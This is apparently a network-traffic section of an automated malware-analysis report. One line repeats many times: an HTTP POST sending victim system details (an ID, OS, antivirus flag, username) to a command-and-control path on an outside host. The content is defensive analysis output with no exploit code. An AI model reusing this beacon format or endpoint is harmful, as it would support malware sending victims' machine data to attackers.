                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
